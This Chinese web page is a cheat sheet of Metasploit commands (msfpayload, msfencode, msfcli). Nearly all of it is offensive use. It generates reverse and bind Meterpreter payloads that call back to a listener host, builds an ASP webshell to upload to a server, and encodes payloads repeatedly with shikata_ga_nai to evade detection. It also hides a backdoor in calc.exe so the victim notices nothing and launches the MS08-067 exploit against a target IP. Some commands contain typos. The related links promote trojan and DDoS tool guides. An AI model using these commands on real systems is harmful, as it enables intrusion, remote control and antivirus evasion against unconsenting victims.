当前位置: 移动技术网 > 网络运营>安全>工具 > MSF常用的监听模块命令

MSF常用的监听模块命令

2018年01月02日  | 移动技术网网络运营  | 我要评论
msfpayload 命令   帮助msfpayload -h   列出所有可用的攻击载荷  msfpayload windows/meterpreter

msfpayload 命令

 

帮助msfpayload -h

 

列出所有可用的攻击载荷  msfpayload windows/meterpreter/bind_tcp O

 

列出所有windows/meterpreter/bind_tcp 下攻击载荷的配置项(任何攻击载荷都是可以配置的)msfpayload windows/meterpreter/bind_tcp O.

 

创建一个meterperter的reverse_tcp攻击载荷,回连到your ip的端口,将其保存为名为payload.exe的windows可执行程序msfpayload windows/meterpreter/reverse_tcp LHOST=your ip LPORT=port X > payload.exe

 

与上生成同样的攻击载荷,导出成原始格式文件,该文件将后面的MSFencode中使用msfpayload windows/meterpreter/reverse_tcp LHOST=your ip LPORT=port R > payload.raw

 

与上面生成同样的攻击载荷,但导出成C格式的shellcodemsfpayload windows/meterpreter/bind_tcp LPORT=port C > payload.c

 

导出成以%U编码方式的javascript语言字符串msfpayload windows/meterpreter/bind_tcp LPORT=port J > payload.java

 

产生webshell将此webshell上传到服务器,这个步骤要有上传权限msfpayload windows/meterpreter/reverse_tcp LHOST=your_ip | msfencode -t asp -o webshell.asp

 

启动msfconsole 输入:use exploits/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST your_ipexploit

 

msfencode 命令

 

帮助msfencode -h

 

列出所有可用的编码器msfencode -l

 

显示编码缓冲区的格式msfencode -t (c,elf,java,js_Le,js_be,perl,raw,ruby,vba,vbs,loop-vbs,asp,war,macho)

 

使用shikata_ga_nai编码器对payload.raw文件进行5次编码,然后导出一个名为encoded_payload.exe的文件msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe

 

创建一个经过多种编码格式的嵌套编码的攻击载荷msfpayload windows/meterpreter/bind_tcp LPORT=port R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe

 

创建一个纯字母数字的shellcode,由ESI寄存器指向shellcode,以C语言格式输出msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c

 

msfcli命令

 

仅列出渗透攻击模块msfcli|grep exploit

 

仅列出与windows相关的渗透攻击模块msfcli|grep exploit/windows

 

对对方IP发起ms08_067_natapi渗透攻击,配置bind_tcp攻击载荷,并绑定在443端口进行监听msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_ctp LPORT=443 RHOST=对方IP E

 

metasploit高级忍术

 

创建一个反弹式的meterpreter攻击载荷,回连到192.168.1.1主机的443端口,使用calc.exe作为载苛后门程序,让载荷执行流一直运行在被攻击的应用程序中,最后生成以.shikata_ga_nai编码器编码后的攻击载荷可执行程序payload.exemsfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 R | msfencode -x calc.exe -k -o payload.exe -e x86/skikata_ga_nai -c 7 -t exe

 

创建一个反弹式的meterpreter攻击载荷,回连到192.168.1.1主机的443端口,使用calc.exe作为载苛后门程序,不让载荷执行流一直运行在被攻击的应用程序中,同时在攻击载荷执行后也不会在目标主机上弹出任何信息,这种配置非常有用,当你通过浏览器漏洞控制了远程主机,并不想让计算器程序打开呈现在目标用户面前。同样,最后生成用.shikata_ga_nai编码器的攻击载荷可执行程序payload.exemsfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 R | msfencode -x calc.exe -o payload.exe -e x86/skikata_ga_nai -c 7 -t exe

 

创建一个raw格式的bind_tcp模式meterpreter攻击载荷,用.shikata_ga_nai编码7次,输出以payload.exe命名的windows可执行程序文件,同时启用多路监听方式进行执行msfpayload windows/meterpreter/bind_tcp LHOST=192.168.1.1 LPORT=443 R | msfencode -o payload.exe -e x86/shikata_ga_nai -c 7 -t exe && msfcli multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 E

如您对本文有疑问或者有任何想说的,请点击进行留言回复,万千网友为您解惑!

相关文章:

  • 网络刺客2使用指南

    网络刺客2使用指南    “天行”推出网络刺客2已有一年,想当初此软件因其强大的功能被国内“黑”界推为惊世之作。我在得到它后,却有近半年时间在研究、寻找... [阅读全文]
  • 冰河”启示录

    冰河”启示录 作者: 陈经韬 前言:我经常在杂志和报刊上看到此类标题的文章,但大多是骗稿费的,没有任何技术含量.于是一气之下写了这编东西.本人声明如下:(一)... [阅读全文]
  • tfn2k使用方法和对策(3)

        tfn2k使用方法和对策(3) 作者:佳佳 本来想再分两次写完本文,后来发现佳佳要翻译的两篇文章 http://packetstorm... [阅读全文]
  • tfn2k使用方法和对策(2)

        tfn2k使用方法和对策(2) 作者:佳佳     佳佳继续上一次的文章,这一次是攻击测试。 测试环境:     共有5台机器,佳佳是... [阅读全文]
  • 火凤凰2.4使用教程

    今次给大家推荐的是阿风哥的作品:无赖小子。(way).说起来它普及的不广,但是面孔生疏的马儿更加隐蔽。不是众杀毒软件的众矢之的。好像不太容易被查杀。而且作者够仗... [阅读全文]
  • tfn2k使用方法和对策(1)

        tfn2k使用方法和对策(1) 作者:佳佳 今年年初,一些黑客使用DDoS向Yahoo,eBay等著名站点发起攻击,并且使y... [阅读全文]
  • 火凤凰2.0使用教程

    火凤凰是国产木马里最先使用反弹端口的木马,其避开防火墙的能力极其出色,DELPHI编写,功能较多但是不太好用,而且没有配置服务端的改变端口功能,相对而言比较危险... [阅读全文]
  • Nmap网络安全扫描器说明(5)

    Nmap网络安全扫描器说明(5) 作者:作者:Fyodor 译者:quack发布日期:2002-2-6上传日期:2002-2-6来源:不详扫描范例-------... [阅读全文]
  • Nmap网络安全扫描器说明(3)

    Nmap网络安全扫描器说明(3) 作者:作者:Fyodor 译者:quack发布日期:2002-2-6上传日期:2002-2-6来源:不详常规选项-------... [阅读全文]
  • 不需要任何密码就能达到进入中有冰河的机器!!!

    不需要任何密码就能达到进入中有冰河的机器!!!小飞刀 [[冰河第一站]]冰河出现到现在,使用得如此之广,影响如此之大。 却万万没有人想到冰河服务端竟然存在着如此... [阅读全文]
验证码:
移动技术网